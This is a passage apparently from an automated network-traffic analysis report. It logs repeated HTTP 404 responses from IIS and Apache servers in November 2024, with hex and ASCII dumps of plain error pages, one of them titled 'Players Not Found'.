3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Wed, 20 Nov 2024 15:55:28 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Wed, 20 Nov 2024 15:55:32 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Wed, 20 Nov 2024 15:55:34 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Wed, 20 Nov 2024 15:55:36 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 15:55:44 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 15:55:47 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 15:55:49 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not 